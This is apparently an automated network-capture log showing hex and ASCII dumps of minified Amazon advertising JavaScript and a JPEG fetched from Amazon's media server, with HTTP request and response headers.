                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 76 61 72 20 43 72 65 61 74 69 76 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 6e 2e 6f 28 74 2c 65 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 65 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c
                                                                                                                                                                                                                                                                Data Ascii: var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurabl
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 6d 61 7a 6f 6e 5c 2e 2f 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 72 65 74 75 72 6e 20 72 2e 74 65 73 74 28 74 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 31 29 2c 6f 3d 2f 41 6e 64 72 6f 69 64 2f 2e 74 65 73 74 28 72 2e 61 29 3b 65 2e 61 3d 6f 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 65 2c 22 61 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 74 2c 65 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 7b 7d 3b 76 61 72 20 65 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 2e
                                                                                                                                                                                                                                                                Data Ascii: mazon\./;function o(t){return r.test(t)}},function(t,e,n){"use strict";var r=n(1),o=/Android/.test(r.a);e.a=o},function(t,e,n){"use strict";n.d(e,"a",function(){return r});function r(t,e){var n=function(t){if("string"!=typeof t)return{};var e={};return t.
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 70 2d 63 74 78 74 22 29 29 3b 72 65 74 75 72 6e 20 65 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 3d 65 7c 7c 22 2e 22 2c 74 2e 73 70 6c 69 74 28 65 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 70 61 72 73 65 49 6e 74 28 74 2c 31 30 29 7c 7c 30 7d 29 7d 28 65 5b 31 5d 29 3a 5b 5d 7d 72 65 74 75 72 6e 5b 5d 7d 28 29 2c 76 3d 21 21 75 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 75 2e 67 65 74 53 44 4b 56 65 72 73 69 6f 6e 26 26 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 75 2e 67 65 74 53 44 4b 56 65 72 73 69 6f 6e 28 29 2e 6d 61 74 63 68 28 2f 28 5c 64 2b 29 5c 2e 28 5c 64 2b 29 2e 28 5c 64 2b 29 2f 29 3b 69 66 28 74 29 72 65 74 75 72 6e 5b 74 5b 31 5d 2c 74 5b 32 5d 2c 74 5b
                                                                                                                                                                                                                                                                Data Ascii: p-ctxt"));return e?function(t,e){return e=e||".",t.split(e).map(function(t){return parseInt(t,10)||0})}(e[1]):[]}return[]}(),v=!!u&&"function"==typeof u.getSDKVersion&&function(){var t=u.getSDKVersion().match(/(\d+)\.(\d+).(\d+)/);if(t)return[t[1],t[2],t[
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 6f 6e 4f 70 65 6e 49 6e 45 78 74 65 72 6e 61 6c 42 72 6f 77 73 65 72 22 2c 4d 52 41 49 44 5f 4f 50 45 4e 3a 22 6d 72 61 69 64 4f 70 65 6e 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 4d 28 74 2c 65 29 7b 49 5b 74 5d 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 52 28 74 2c 65 29 7b 4d 28 50 2c 65 29 3b 74 72 79 7b 74 2e 63 61 6c 6c 28 74 68 69 73 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 4d 28 41 2c 74 2e 6d 65 73 73 61 67 65 29 2c 21 31 7d 72 65 74 75 72 6e 21 30 7d 76 61 72 20 6b 3d 78 2e 69 73 4d 73 68 6f 70 2c 4c 3d 78 2e 6d 61 73 68 49 73 41 55 49 41 76 61 69 6c 61 62 6c 65 2c 4e 3d 78 2e 6d 61 73 68 48 61 73 4c 61 75 6e 63 68 49 6e 74 65 6e 74 55 72 6c 2c 54 3d 78 2e 6d 61 73 68 48 61 73 4f 70 65 6e 49 6e 45 78 74 65 72 6e 61 6c 42 72 6f 77 73 65 72 3b 66
                                                                                                                                                                                                                                                                Data Ascii: onOpenInExternalBrowser",MRAID_OPEN:"mraidOpen"};function M(t,e){I[t]=e}function R(t,e){M(P,e);try{t.call(this)}catch(t){return M(A,t.message),!1}return!0}var k=x.isMshop,L=x.mashIsAUIAvailable,N=x.mashHasLaunchIntentUrl,T=x.mashHasOpenInExternalBrowser;f
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 22 29 2b 22 2f 61 70 70 2f 61 6d 61 7a 6f 6e 2d 70 72 69 6d 65 2d 6e 6f 77 2f 69 64 39 34 37 36 34 34 39 35 30 3f 6d 74 3d 38 22 7d 28 65 29 2c 75 72 6c 3a 74 7d 29 7d 2c 53 2e 4d 41 53 48 5f 4c 41 55 4e 43 48 5f 49 4e 54 45 4e 54 5f 55 52 4c 29 3a 21 21 54 26 26 52 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 2e 64 65 66 61 75 6c 74 2e 6d 61 73 68 2e 6f 70 65 6e 49 6e 45 78 74 65 72 6e 61 6c 42 72 6f 77 73 65 72 2e 65 78 65 63 75 74 65 28 7b 75 72 6c 3a 74 7d 29 7d 2c 53 2e 4d 41 53 48 5f 4f 50 45 4e 5f 49 4e 5f 45 58 54 45 52 4e 41 4c 5f 42 52 4f 57 53 45 52 29 7d 28 65 2c 63 29 3a 21 6e 26 26 70 26 26 66 26 26 6c 26 26 4f 62 6a 65 63 74 28 42 2e 64 65 66 61 75 6c 74 29 28 65 2c 6e 29 3d 3d 3d 43 2e 61 3f 52 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                                                                                Data Ascii: ")+"/app/amazon-prime-now/id947644950?mt=8"}(e),url:t})},S.MASH_LAUNCH_INTENT_URL):!!T&&R(function(){return o.default.mash.openInExternalBrowser.execute({url:t})},S.MASH_OPEN_IN_EXTERNAL_BROWSER)}(e,c):!n&&p&&f&&l&&Object(B.default)(e,n)===C.a?R(function(
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 34 37 34 30 39 39 31 2c 72 3d 2f 5e 28 3f 3a 30 7c 5b 31 2d 39 5d 5c 64 2a 29 24 2f 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6f 3d 74 79 70 65 6f 66 20 74 3b 72 65 74 75 72 6e 21 21 28 65 3d 6e 75 6c 6c 3d 3d 65 3f 6e 3a 65 29 26 26 28 22 6e 75 6d 62 65 72 22 3d 3d 6f 7c 7c 22 73 79 6d 62 6f 6c 22 21 3d 6f 26 26 72 2e 74 65 73 74 28 74 29 29 26 26 74 3e 2d 31 26 26 74 25 31 3d 3d 30 26 26 74 3c 65 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 31 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 3e 2d 31 26 26 74 25 31 3d 3d 30 26 26 74 3c 3d 6e
                                                                                                                                                                                                                                                                Data Ascii: 4740991,r=/^(?:0|[1-9]\d*)$/;t.exports=function(t,e){var o=typeof t;return!!(e=null==e?n:e)&&("number"==o||"symbol"!=o&&r.test(t))&&t>-1&&t%1==0&&t<e}},function(t,e){var n=9007199254740991;t.exports=function(t){return"number"==typeof t&&t>-1&&t%1==0&&t<=n
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC680INData Raw: 6e 20 6e 29 69 66 28 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 69 29 29 7b 76 61 72 20 75 3d 6e 5b 69 5d 3b 69 66 28 75 29 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 75 29 72 28 75 29 3b 65 6c 73 65 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 75 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 43 6f 75 6c 64 20 6e 6f 74 20 66 69 72 65 20 70 69 78 65 6c 3a 20 22 27 2b 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 75 29 2b 27 22 20 69 73 20 6e 6f 74 20 61 20 73 74 72 69 6e 67 21 27 29 3b 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 75 29 7d 7d 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 65 29 3b 76 61 72 20 72 3d 6e 28 31 29 2c 6f 3d 6e 28 32 29 2c 69 3d
                                                                                                                                                                                                                                                                Data Ascii: n n)if(n.hasOwnProperty(i)){var u=n[i];if(u)if("string"==typeof u)r(u);else{if(!Array.isArray(u))throw new Error('Could not fire pixel: "'+JSON.stringify(u)+'" is not a string!');t.apply(this,u)}}}},function(t,e,n){"use strict";n.r(e);var r=n(1),o=n(2),i=
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 77 69 6e 64 6f 77 2e 41 50 45 5f 4c 41 2c 6e 3d 74 3f 22 6d 6f 62 69 6c 65 22 3a 22 64 65 73 6b 74 6f 70 22 2c 72 3d 22 61 70 65 5f 47 61 74 65 77 61 79 5f 22 2b 6e 2b 22 2d 68 31 5f 22 2b 6e 2b 22 5f 70 6c 61 63 65 6d 65 6e 74 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 73 70 6f 6e 73 6f 72 65 64 2d 70 69 6c 6c 22 29 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6f 26 26 65 26 26 65 2e 6c 61 62 65 6c 52 65 6e 64 65 72 65 64 28 72 29 7d 29 2c 6f 26 26 6f 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                Data Ascii: isteners=function(t){var e=window.APE_LA,n=t?"mobile":"desktop",r="ape_Gateway_"+n+"-h1_"+n+"_placement",o=document.querySelector(".sponsored-pill");window.addEventListener("load",function(){o&&e&&e.labelRendered(r)}),o&&o.addEventListener("click",functio
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 73 50 72 65 76 69 65 77 3b 69 66 28 6f 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 61 3d 7b 77 69 64 74 68 3a 65 2c 68 65 69 67 68 74 3a 6e 7d 3b 69 66 28 72 29 72 65 74 75 72 6e 20 75 26 26 31 30 38 30 3d 3d 3d 65 3f 7b 77 69 64 74 68 3a 32 31 36 2c 68 65 69 67 68 74 3a 33 38 34 7d 3a 75 26 26 37 35 30 3d 3d 3d 65 26 26 31 33 33 34 3d 3d 3d 6e 3f 7b 77 69 64 74 68 3a 33 32 35 2c 68 65 69 67 68 74 3a 36 36 37 7d 3a 75 26 26 36 34 30 3d 3d 3d 65 26 26 31 31 33 36 3d 3d 3d 6e 3f 7b 77 69 64 74 68 3a 33 32 30 2c 68 65 69 67 68 74 3a 35 36 38 7d 3a 6e 75 6c 6c 3b 69 66 28 75 26 26 31 38 30 30 3d 3d 3d 65 29 72 65 74 75 72 6e 7b 77 69 64 74 68 3a 33 32 34 2c 68 65 69 67 68 74 3a 31 38 30 7d 3b 69 66 28 63 28 61 2c 7b 77 69 64 74 68 3a 33 30 30 2c 68 65
                                                                                                                                                                                                                                                                Data Ascii: sPreview;if(o)return null;var a={width:e,height:n};if(r)return u&&1080===e?{width:216,height:384}:u&&750===e&&1334===n?{width:325,height:667}:u&&640===e&&1136===n?{width:320,height:568}:null;if(u&&1800===e)return{width:324,height:180};if(c(a,{width:300,he
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 64 53 69 7a 65 3a 22 39 36 70 78 20 31 35 70 78 22 7d 2c 69 3d 7b 44 45 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3a 22 31 31 36 70 78 20 31 35 70 78 22 7d 2c 45 53 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3a 22 31 32 31 70 78 20 31 35 70 78 22 7d 2c 46 52 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3a 22 31 30 36 70 78 20 31 35 70 78 22 7d 2c 49 54 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 53 69 7a 65 3a 22 38 34 70 78 20 31 35 70 78 22 7d 7d 2c 75 3d 7b 74 6f 70 72 69 67 68 74 3a 7b 74 6f 70 3a 30 2c 72 69 67 68 74 3a 30 7d 2c 74 6f 70 6c 65 66 74 3a 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 2c 62 6f 74 74 6f 6d 6c 65 66 74 3a 7b 62 6f 74 74 6f 6d 3a 30 2c 6c 65 66 74 3a 30 7d 2c 62 6f 74 74 6f 6d 72 69 67 68 74 3a 7b 62 6f 74 74 6f 6d 3a 30
                                                                                                                                                                                                                                                                Data Ascii: dSize:"96px 15px"},i={DE:{backgroundSize:"116px 15px"},ES:{backgroundSize:"121px 15px"},FR:{backgroundSize:"106px 15px"},IT:{backgroundSize:"84px 15px"}},u={topright:{top:0,right:0},topleft:{top:0,left:0},bottomleft:{bottom:0,left:0},bottomright:{bottom:0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                58192.168.2.449900151.101.129.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC662OUTGET /images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: m.media-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://images-eu.ssl-images-amazon.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC525INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 94765
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: b8ceec20-3245-42b8-8c0c-47bf23ccb7c5
                                                                                                                                                                                                                                                                Last-Modified: Tue, 11 Jan 2022 14:51:27 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 82945
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:28 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200053-IAD, cache-ewr18127-EWR
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 4a 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 01 00 69 87 04 00 01 00 00 00 1a 00 00 00 00 00 00 00 01 00 86 92 07 00 15 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 65 72 73 69 6f 6e 20 31 2e 30 2e 30 00 ff db 00 43 00 06 04 04 04 05 04 06 05 05 06 09 06 05 06 09 0b 08 06 06 08 0b 0c 0a 0a 0b 0a 0a 0c 10 0c 0c 0c 0c 0c 0c 10 0c 0e 0f 10 0f 0e 0c 13 13 14 14 13 13 1c 1b 1b 1b 1c 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff db 00 43 01 07 07 07 0d 0c 0d 18 10 10 18 1a 15 11 15 1a 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f 1f ff c0 00 11 08 01 f4 07 94 03 00 11 00 01 11 01 02 11 01 ff c4
                                                                                                                                                                                                                                                                Data Ascii: JFIFJExifII*i,Version 1.0.0CC
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 41 04 d1 c6 f9 1e d8 e3 69 7c 8f 21 ac 63 46 49 27 90 00 04 4b 65 69 0e 06 df ae e1 b3 dd 24 fc 1d 4e 79 98 b1 ba 6c 7e 77 d1 67 cf 2e fc d5 53 26 ae b1 ca 39 ba 18 7b 3e d3 1b df e1 8f dd b8 f4 c7 01 74 95 23 5a 59 6e 15 8f fa 55 35 c7 78 3f 06 11 b4 fc 9a 16 89 c9 92 dd 67 65 a8 c7 86 9d 23 79 fb b3 5a 5e 17 69 58 47 3b 7d 13 7c a3 a4 81 bf 6e c2 54 70
                                                                                                                                                                                                                                                                Data Ascii: Ai|!cFI'Kei$Nyl~wg.S&9{>t#ZYnU5x?ge#yZ^iXG;}|nTp
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: fb c7 2f e3 65 a2 36 3a 49 1a c6 fb cf 21 a3 e2 4e 15 d9 9d a3 77 99 c7 8e 6f 68 ac 75 99 d9 9a dc 9e da 4b 44 bb 79 06 47 d9 b3 e7 ec 85 c1 c1 1c 79 63 e7 bb ea dd a9 92 34 da 2b 6d f9 69 c3 1f fe b0 c2 17 7d f2 61 01 01 01 01 01 01 01 01 01 01 05 5c 16 7b b5 43 43 a9 e8 aa 26 69 e8 e8 e2 7b 87 d6 01 5a ad a8 c7 5e b6 ac 7d 61 94 52 d3 d2 12 d4 da ee 54 a3 75 4d 24 d0 0f 19 23 7b 07 ed 00 a6 99 a9 6e ed a2 7e a4 d2 63 ac 29 96 c6 22 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 08 20 d8 fc 19 d2 2f b9 de 5b 75 9a 32 e8 29 5e 19 4d 91 c9 d3 f5 cf ea 03 9f 89 1e 0a 9e b3 2f 0d 76 8e b2 e9 f6 6e 0e 2b 71 cf 4a ba c2 c3 69 8e 18 98 31 ec c7 cf e2 e5 53 16 3d a3 75 ad 46 5e 29 5f b1 92 b7 2b a6 52 22 10 0a 00 50 08 22 82 08 0a 43 92 08 61 40 61 48
                                                                                                                                                                                                                                                                Data Ascii: /e6:I!NwohuKDyGyc4+mi}a\{CC&i{Z^}aRTuM$#{n~c)" /[u2)^M/vn+qJi1S=uF^)_+R"P"Ca@aH
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 27 87 36 2d 5d 60 be 50 38 b6 b6 82 a2 9c 8f f9 48 de d1 f5 91 85 b6 2f 13 d2 5a 6d 8a d1 d6 25 41 82 3a 85 93 58 80 a4 10 32 81 94 04 11 40 44 08 08 08 22 80 80 80 80 80 80 80 80 80 81 dc 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 80 83 34 b2 54 8a bb 5c 61 fe d1 60 31 48 0f 97 2f ea ae 16 aa 9c 19 27 6f 9b ea 9d 85 a9 8d 46 8e bc 5c e6 3e 19 fa 7f c6 ca
                                                                                                                                                                                                                                                                Data Ascii: '6-]`P8H/Zm%A:X2@D"4T\a`1H/'oF\>
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: 45 a7 c1 f2 bb e9 b3 6b f5 37 b6 3a ef 13 69 e7 e1 11 e1 cf e4 be 5b f4 cd 34 38 7d 51 ed e4 fc 9f a0 3e 5d ea 86 6d 75 ad ca bc a1 eb 3b 3b d9 6c 58 b6 b6 6f f1 2d e5 f9 7f e7 eb f6 54 57 5e e8 28 47 66 d2 24 91 bc 84 51 e3 03 e2 7a 05 ab 16 96 f9 39 f4 8f 35 dd 7f 6e e9 b4 91 c3 1f 15 a3 f2 d7 c3 e7 e1 1f cf a2 c3 36 a5 ba 3e 42 e6 3c 44 de e6 35 a0 fd a4 15 d2 ae 87 1c 47 3e 6f 1f 9f da 8d 5d ed bd 66 29 1e 51 11 fd 77 5a 95 b7 9d 10 10 10 10 74 1f 03 74 43 2d 96 61 a8 2b 23 ff 00 c2 17 26 ff 00 a3 6e 1c e3 a6 ea dc 79 c9 ef 7c 30 be 7f ed 2f 69 4e 5c 9e e6 b3 f0 53 af ad bf e3 f9 dd db d0 60 e1 af 14 f5 9f e1 b4 97 97 74 04 04 04 04 04 04 04 1a 37 8f 9a 32 2a 79 a1 d5 14 71 86 b6 a1 c2 0b 8b 5a 39 76 98 fc 5c bc bf 28 34 b5 de 78 f1 5e e3 d9 6e d1 9b
                                                                                                                                                                                                                                                                Data Ascii: Ek7:i[48}Q>]mu;;lXo-TW^(Gf$Qz95n6>B<D5G>o]f)QwZttC-a+#&ny|0/iN\S`t72*yqZ9v\(4x^n
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC1378INData Raw: f3 cd 5a 16 4c 51 27 9a 80 ca 06 54 82 06 50 10 45 01 01 03 28 19 41 a5 b8 e9 a3 b5 1c fa 86 9b 54 5b 2d 6f bd 50 be 89 b4 15 b4 d0 03 25 45 39 8d e6 46 ca c8 f2 3d 83 9c 1d bc f2 b2 ac b1 b4 6f d5 53 c0 1d 17 a8 ad 75 97 ad 47 75 a3 7d ae 9a e7 0c 54 b4 54 13 0d b3 c8 23 71 71 9e 46 fd 1e b8 6e 79 a8 b1 5e 8d c2 b1 64 20 c7 35 c7 10 74 a6 88 b6 c1 72 d4 b5 2f a5 a5 a9 98 53 c0 62 89 d3 39 d2 63 71 f6 5b d0 06 8c 94 16 cb 4f 1a 38 4b 76 78 8e 8f 54 d1 b6 47 73 11 d4 97 53 b8 fc 3b 40 d0 54 6e cb 86 59 75 15 5d 05 c2 21 2d be b2 9e b6 27 7b b2 53 ca c9 01 f8 6d 25 4e e8 d9 ee e8 a6 6f bc c2 07 c1 10 90 94 04 13 65 01 48 8a 02 08 84 11 50 08 23 84 10 c0 40 41 05 21 84 0c 20 6d 41 0d a8 20 58 d7 75 19 41 69 be e9 7b 3d ea 8d f4 b7 1a 46 55 41 20 da e6 b8 0c
                                                                                                                                                                                                                                                                Data Ascii: ZLQ'TPE(AT[-oP%E9F=oSuGu}TT#qqFny^d 5tr/Sb9cq[O8KvxTGsS;@TnYu]!-'{Sm%NoeHP#@A! mA XuAi{=FUA
                                                                                                                                                                                                                                                                2024-08-12 13:23:28 UTC680INData Raw: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 0b d5 bb 47 6a 0a f0 1f 1d 31 8a 23 d2 49 bf 16 3e a3 ed 1f 90 56 31 e9 72 5b c1 53 2e bb 15 3a ce f3 e8 bf 53 70 be a0 80 6a 6b d8 c3 de d8 d8 5f f6 b8 b3 ee 56 ab d9 f3 e3 2a 56 ed 78 f0 aa ac 70 c2 8b 1c eb a4 cf 8e c6 ff 00 8a cf ff 00 4f 8f 36 af fd 5e df a6 14 f3 f0 bd f8 26 9e e0 09 ee 6c 91 e3 ed 0e 3f 72 c2 dd 9f e5 2c eb da fe 75 fd d6 3b 86 86 d4 54 60 b8 40 2a 63 1d 5d 01 df fb 27 0e fb 15 7b e8 f2 57 c3 7f 92 e6 2e d0 c5 7f 1d be 6b 0b 98 e6 38 b5 e0 b5 cd 38 2d 23 04 15 5a 61 76 27 74 14 24 40 40 40 40 40 40 41 16 31 ef 78 63 1a 5c f7 72 0d 03 24 a4 cc 44 6f 2c a9 8e d7 98 ad 63 79 9f 08 5f 2d fa 5e 69 30 fa c7 76 4c ff 00 93 6f 37 1f 89 e8 17 3f 36 be 23 95 79 bd 6f 67 7b 29 92 fb 5b 3c f0 57
                                                                                                                                                                                                                                                                Data Ascii: Gj1#I>V1r[S.:Spjk_V*VxpO6^&l?r,u;T`@*c]'{W.k88-#Zav't$@@@@@@A1xc\r$Do,cy_-^i0vLo7?6#yog{)[<W
